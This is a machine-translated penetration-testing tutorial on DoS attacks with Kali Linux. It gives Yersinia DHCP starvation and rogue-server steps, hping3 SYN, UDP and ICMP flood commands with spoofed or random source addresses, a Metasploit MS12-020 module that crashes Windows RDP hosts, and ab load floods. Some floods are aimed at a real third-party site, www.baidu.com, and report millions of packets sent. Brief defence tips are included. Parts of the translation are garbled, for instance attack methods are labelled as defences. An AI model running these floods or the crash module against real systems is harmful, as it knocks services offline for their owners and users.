Kali Linux penetration testing-DoS attacks and defense
As a Penetration Tester, sometimes we need to test the customer's system against DDOS attacks. At this time, we need a qualified testing tool. In Kali Linux, some DDOS testing tools are integrated for testing. The following describes some testing tools.
Denial of Service attack under kali:
D (D) OS ........................................ 1
Yersinia...
Hping3 ........................................ 3
Using metasploit for SynFlood attacks ......
Web dos (stress testing) ......
1. DOS (DDOS)
A Denial-of-Service attack can be exploited by attackers to stop the target machine from providing services.
Common scenarios include consuming bandwidth, CPU, and memory resources (various flood attacks)
Prolonged Server Response Time
Use Service vulnerabilities to attack services
IP Spoofing
2. YERSINIA
Project address http://vip.2cto.com underlying protocol attack intrusion detection tool for a variety of protocol attacks
For example, capture the root role of the Spanning Tree (Spanning Tree Protocol: Spanning Tree Protocol), generate a virtual CDP (Cisco Discovery Protocol: Cisco Discovery Protocol) neighbor, in a HSRP (hot wait routing Protocol: hot Standby Router Protocol) virtual into an active Router, fake DHCP feedback, and other underlying attacks.
Generally, graphical attack interfaces are used.
Usage: yersinia [-hVGIDd] [-l logfile] [-c conffile] protocol [protocol_options]
-V version information
-H: Get help information
-G graphical work interface
-I interactive mode.
-D background Mode
-D debugging
-L logfile: select a log file
-C conffile: select the configuration file
Protocols that can be attacked: cdp, dhcp, dot1q, dot1x, dtp,
Hsrp, isl, mpls, stp, vtp.
Enable graphical interface for yersinia-G
Case: attack test DHCP Service
DHCP server, windows server 2003, and IP Address: 192.168.10.10
Kali Linux/IP: 192.168.10.100
First, let's take a look at how DHCP gets IP addresses.
Step 1: Start the DHCP server
On a DHCP (windows server 2003) server, the allowed IP address range is 192.168.10.100-200.
Kali has already rented 192.168.10.100.
Step 2: Start the yersinia attack program
Select the corresponding Nic interface in yersinia
There are four methods to defend against DHCP Attacks:
Sending RAW packet # send the original data packet
Sending DISCOVER packet # send a request to obtain the IP address packet, occupying all IP addresses, resulting in DOS
Creating DHCP rogue server # create a false DHCP server to link the user. Real DHCP cannot work.
Sending RELEASE packet # Send a release ip request to the DHCP server, causing all IP addresses in use to become invalid
Dhcp discover test attack
Once the DHCP server is under DISCOVER attack, all valid IP addresses in the address pool cannot be used, and new users cannot obtain IP addresses.
Note: although all IP addresses are occupied, they are not displayed in the DHCP address pool.
Step 3: Verify the attack results
If you use windows xp to obtain the ip address, the command execution of the obtained ip address is invalid.
So our dhcp discover attack will take effect !!!
Defense solution:
Enable port listening on a vswitch and set a trusted port and a non-trusted port. By default, all vswitch ports are untrusted ports. Untrusted port: the port connecting to the terminal device. The client can only send DHCP request packets, but discard all other DHCP packets (such as DHCP offer) from the port. Trust Port: connects to a valid DHCP server or aggregation interface to forward and receive all DHCP packets.
Enable the Switch port listening function: Switch (config) # ipdhcp snooping setting the DHCP listener acts on that VLAN: Switch (config) # ipdhcp snooping vlannumber to configure port trust or non-trust: switch (config-if) # ipdhcp snooping trust insert option 82 Information in the message: Switch (config) # ip dhcp snoopling infornamation option limits DHCP packet rate, jianhuan DHCP depletion Attack: switch (config-if) # ip dhcp snoopling limit rate (rate) to defend against DHCP attacks
3. Hping3
TCP/IP packet assembly/analysis tools
Supports multiple protocols (ICMP, TCP, UPD, RAW-IP, etc)
Run multiple operating systems (Linux, FreeBSD, NetBSD, OpenBSD, Solaris, MacOs X, Windows)
It can be used for firewall testing, port scanning, operating system testing, and network inspection.
Usage:
-H -- help displays help information-v -- version displays Hping version information-c -- count specifies the number of data packets-I -- interval specifies the packet sending interval in milliseconds, such as-I m10: indicates that the packet sending interval is 10 milliseconds.
-- Fast is equivalent to-I m100, that is, 10 packets are sent per second-n -- numeric specifies to output-q -- quiet in the form of a number to exit Hping-I -- interface and specify the IP address, if the local machine has two NICs, you can use this parameter to specify the IP address of the packet to be sent. If this parameter is not specified, the gateway IP-V -- verbose redundancy mode-D -- debug debugging information-z -- bind is used by default to bind ctrl + z to ttl, by default, the DST port-Z -- unbind is used to unbind ctrl + z: default Mode: TCP mode-0 -- rawip raw ip Mode-1 -- icmp ICMP mode-2 -- udp UDP mode-8 -- scan mode. for example, hping -- scan 1-30, 70-90-S www.tar get. host-9 -- IP Option of listen listening mode: -a -- spoof spoofing source Address Spoofing -- rand-dest random destination address mode -- rand-source random source address mode-t -- ttl value, the default value is 64-N -- id, the default value is random-W -- winid. Use the win * id byte sequence-r -- the relative id region of rel-f -- frag to fragment the data packet and transmit it (you can access the data packet through the weak acl (Access control List )) -x -- morefrag: Set more part markers-y -- dontfrag: Set the part marker-g -- fragoff: Set the part offset-m -- mtu to set the virtual MTU, when the data packet is larger than MTU, -- frag must be used for sharding-o -- tos to specify the service type. The default value is 0x00. You can use
-- Tos help view help-G -- rroute contains the RECORD_ROUTE option and displays the route cache -- lsrr release source route record -- ssrr Strict Source Route record-H -- ipproto SET protocol range, only use the ICMP option-C -- icmptype in raw ip Mode to specify the icmp type (the default type is Echo Request)-K -- icmpcode to specify the icmp encoding (the default value is 0) -- force-icmp: Send all ICMP data packet types (only supported types are sent by default)
-- Icmp-gw sets the gateway address (0.0.0.0 by default) for ICMP packet redirection -- icmp-ts is equivalent to -- icmp -- icmptype 13 (ICMP timestamp) -- icmp-addr is equivalent to -- icmp -- icmptype 17 (ICMP address mask) -- icmp-help displays other help options of ICMP.
UDP/TCP option-s -- baseport basic source port (random by default)-p -- destport destination port (0 by default ), you can specify multiple ports-k -- keep at the same time and keep the source port-w -- win to specify the packet size, the default value is 64-O -- tcpoff. The false TCP Data offset-Q -- seqnum only displays the TCP serial number-B -- badcksum. packets trying to send incorrect IP checksum are used by many systems when sending packets. fixed IP address checksum, therefore, you will get an incorrect UDP/TCP Checksum. -M -- setseq: Set the TCP serial number-L -- setack: Use the tcp ack (Access Control List) -F -- fin use FIN to mark set FIN flag-S -- syn use SNY to mark-R -- rst use RST to mark-P -- push use PUSH to mark-A -- ack use ACK to mark-U -- urg uses URG flag-X -- xmas uses X unused flag (0x40) -Y -- ymas use Y unused tag (0x80) -- tcpexitcode finally uses tcp-> th_flags as the exit code -- tcp-timestamp start TCP timestamp option to guess the general running time option-d -- data size, the default value is 0-E -- file. The data is read from the specified file.-e -- sign is added.-j -- dump is saved as Sixteen data packets.-J -- print: the output character-B is saved. -- safe enable security protocol-u -- end: stops and displays when the end of a file specified by--file, prevent files from starting from scratch-T -- traceroute route tracing mode -- tr-stop exit when receiving the first non-ICMP packet in route tracing mode -- tr-keep-ttl to keep the source TTL, useful for monitoring a hop -- tr-no-rtt does not calculate or display the RTT information ARS packet description when using the route tracking mode (newly added content is not stable yet) -- send the packets that describe the apd
Usage:
Hping3-S-a 1.1.1.1 -- flood-V www.xxx.com
Hping3-S-P-U -- flood-V -- rand-source www.xxx.com
Hping3-c 100000-d 120-S-w 64-p 80 -- flood -- rand-source www. xxx. cpm
Hping3-q-n-a 1.1.1.1-S-s 53 -- keep-p 22 -- flood www.xxx.com (SYN Flood)
Hping3-q-n-a 1.1.1.1-SARFU-p 80-I u10000 www.xxx.com (TCP Connect Flood)
Hping3-q-n-a 1.1.1.1-SARFU-p 22 -- flood www.xxx.com (TCP Connect Flood)
Hping3-q-n-a 1.1.1.1 -- udp-s 53 -- keep-p 68 -- flood www.xxx.com (UDP Flood)
Hping3-q-n-a 1.1.1.1 -- id 0 -- icmp-d 56 -- flood www. xxx. xom (ICMP Flood)
Test Description:
A). hping3-S-a 1.1.1.1-V www.baidu.com # Send the SYN Packet. The source of the forged ip address is 1.1.1.1.
-A: Counterfeit IP Address Source
-V redundancy mode
-S: Send SYN packets
-- Flood only sends data packets, regardless of inbound data echo
Start wireshark packet capture to check whether the forged IP 1.1.1.1 takes effect
Select the capture function key to determine the network card that the listener is listening.
Click start to capture packets
Through data analysis, we can see that the source of the data packet is successfully forged, and packets are continuously sent out.
B). hping3-S-V -- flood -- rand-source-c 10000-d 150-w 64-p 80 www.baidu.com
-C 10000 Number of sent packets
-D 150: the size of each packet sent
-W 64 TCP Window Size
-P 80: The target port of the attack, which can be set at will
-- Ran-source uses the random source IP address
Wireshark shows that more than 20 million data packets are sent in less than one minute.
C). hping3-SARFU-V -- flood -- rand-source-c 10000-d 150-w 64-p 80 www.baidu.com
-SARFU sends packets of different protocols, such as SYN, ARP, and UDP.
Defense solution:
Ensure adequate bandwidth;
Use high-performance network devices;
Clean and filter exceptions smoothly;
Distributed defense;
Anti-DDOS Devices;
4. DoS attacks using System Vulnerabilities
Scan 445 or 3389 of machines
Exploiting MS12-020 Vulnerabilities
Use metasploit for attacks
Use metasploit for SynFlood attacks
Use auxiliary/dos/tcp/synflood
Use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
......
Test Case:
Kali linux host ip: 192.168.10.3
Windows server 2003 Test Machine ip Address: 192.168.10.10
A windows RDP SynFlood experiment:
Start msfconsole on kali
Use the search function in msfconsole to search for integrated DOS service programs
.
Test A windows RDP attack
Use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
Set the IP address of the host to be attacked and run the payload attack.
If the attack succeeds, seems down (PC over) is displayed)
Now let's see that the screen of the target is blue.
OK !!!
Defense solution:
Promptly update system patches;
Use the Client Firewall;
5. web dos (stress testing)
Website performance stress testing is an essential part of performance tuning.
Only when the server is under high pressure can the problems exposed by various settings be truly reflected.
The AB command creates many concurrent access threads to simulate multiple visitors simultaneously accessing a URL address.
It is URL-based. Therefore, it can be used to test the load pressure of Apache,
You can also test the pressure on other Web servers, such as nginx, lighthttp, tomcat, and IIS.
The AB command has very low requirements on the computer that sends out the load. It neither occupies a high CPU nor occupies a lot of memory,
But it will cause a huge load on the target server. The principle is similar to CC attacks.
However, you must also pay attention to the test. Otherwise, too much load at a time may cause the target server to crash due to resource consumption or serious problems.
Usage:
-N requests Number of requests to perform # Number of requests executed in the test session (total Number of visits to the page in this test ). By default, only one request is executed. -C concurrency Number of multiple requests to make # Number of requests generated at a time (Number of concurrent requests ). The default value is one at a time. -T timelimit Seconds to max. wait for responses # maximum number of Seconds for testing. The implicit value is-n 50000. It limits the server test to a fixed total time. By default, there is no time limit. -P postfile File containing data to POST # The File that contains the data to be POST. The format of the File is "p1 = 1 & p2 = 2". The usage is-p 111.txt. (With-T)-T content-type Content-type header for POSTing # Content-type header used by POST data, for example,-T "application/x-www-form-urlencoded ". (With-p)-v verbosity How much troubleshooting info to print # Set the details of the displayed information-4 or a greater value will display the header information, 3 or greater values can display the response code (404,200, etc.), 2 or greater values can display warnings and other information. -V displays the version number and exits. -W Print out results in HTML tables # output results in HTML table format. By default, it is a table of the width of the two columns of the white background. -I Use HEAD instead of GET # execute the HEAD request instead of GET. -X attributes String to insert as table attributes-y attributes String to insert as tr attributes-z attributes String to insert as td or th attributes-C attribute Add cookie, eg. -C "c1 = 1234, c2 = 2, c3 = 3" (repeatable) #-C cookie-name = value attaches a Cookie to the request: Row. The typical form is a parameter pair of name = value. This parameter can be repeated and separated by commas. Tip: You can use the session implementation principle to pass the JSESSIONID parameter to achieve session persistence, such as-C "c1 = 1234, c2 = 2, c3 = 3, JSESSIONID = ff056cd16da9d71cb1_c1d56f0319f8 ″. -H attribute Add Arbitrary header line, eg. 'Accept-Encoding: gzip' Inserted after all normal header lines. (repeatable)-A attribute Add Basic WWW Authentication, the attributesare a colon separated username and password. -P attribute Add Basic Proxy Authentication, the attributesare a colon separated username and password. #-P proxy-auth-username: password provides BASIC authentication trust for a transit proxy. The user name and password are separated by one and sent in base64 encoding format. This string is sent regardless of whether the server needs it (that is, whether the 401 authentication request code is sent. -X proxy: port Proxyserver and port number to use-V Print version number and exit-k Use HTTP KeepAlive feature-d Do not show percentiles served table. -S Do not show confidence estimators and warnings. -g filename Output collected data to gnuplot format file. -e filename Output CSV file with percentages served-h Display usage information (this message) #-attributes sets the attribute string. the defect program has various static declared fixed-length buffers. In addition, parsing command line parameters, server response headers, and other external inputs is also simple, which may have adverse consequences. It does not fully implement HTTP/1.x; only accept some 'preview' response formats. Frequent use of strstr (3) may cause performance problems, that is, you may be testing the performance of AB rather than the server.
There are many parameters, but in general stress testing, only the-n and-c parameters can be used.
AB-n 10000-c 1000 http: // 192.168.10.4
Root @ kali :~ # AB-n 1000-c 100 http: // 192.168.10.4/wp-login.php
This is apache.pdf, Version 2.3
Copyright 1996 Adam Twiss, Zeus Technology Ltd, http://www.zeustech.net/
Licensed to The Apache Software Foundation, http://www.apache.org/
Benchmarking 192.168.10.4 (be patient)
Completed100 requests
Completed200 requests
Completed300 requests
^ C (the web server gets stuck after 300 requests, stops responding, and terminates)
Server Software: Apache
Server Hostname: 192.168.10.4
Server Port: 80
Document Path:/wp-login.php # test page
Document Length: 3192 bytes # page size
Concurrency Level: 100 # number of concurrent jobs
Time taken for tests: 36.861 seconds # test duration
Complete requests: 321 # number of completed requests
Failed requests: 0 # number of Failed requests
Write errors: 0
Total transferred: 1137945 bytes
HTML transferred: 1024632 bytes
Requests per second: 8.71 [#/sec] (mean) # One of the important indicators, equivalent to the number of transactions per second in LR
Time per request: 11483.128 [MS] (mean) # One of the important indicators, equivalent to the average transaction response Time in LR
Time per request: 114.831 [MS] (mean, messaging SS all concurrent requests) # actual runtime of each connection request
Transfer rate: 30.15 [Kbytes/sec] canceled ed
Connection Times (MS)
Min mean [+/-sd] median max
Connect: 0 6 8.7 2 37
Processing: 179 2934 2131.5 2559 24266
Waiting: 179 2921 2130.6 2548
Total: 211 2940 2127.5 2560
Percentage of the requests served within a certain time (MS)
50% 2560 (50% request time is 2560 ms)
66% 3124
75% 3553
80% 3892
90% 5169 (90% request time is 5169 ms)
95% 5898
98% 8080
99% 8535 (99% request time is 8535 ms)
100% 24266 (longest request)
Here, we can see that with the sending of a large number of data packets, the link response time is increasing, and the DoS effect starts to produce.
Netstat-atupln | grep 80 | wc-l
I wanted to count port 80 request data, but it got stuck before it started, proving that the test was effective.
Note: because the maximum number of web connections allowed is 200, it gets stuck faster.
Defense solution:
Optimize application code performance: make rational use of memchces;
Well optimized network architecture: load balancing and traffic distribution;
Countermeasure: Limit the request frequency of each IP address, and use the verification code to limit the size of each packet;
Reasonably configure the Timout and KeepAliveTimeout of the Web Server;
Use WEB application firewall;
Make the website a static page;
NOTICE: This experiment is for reference purposes only !!!
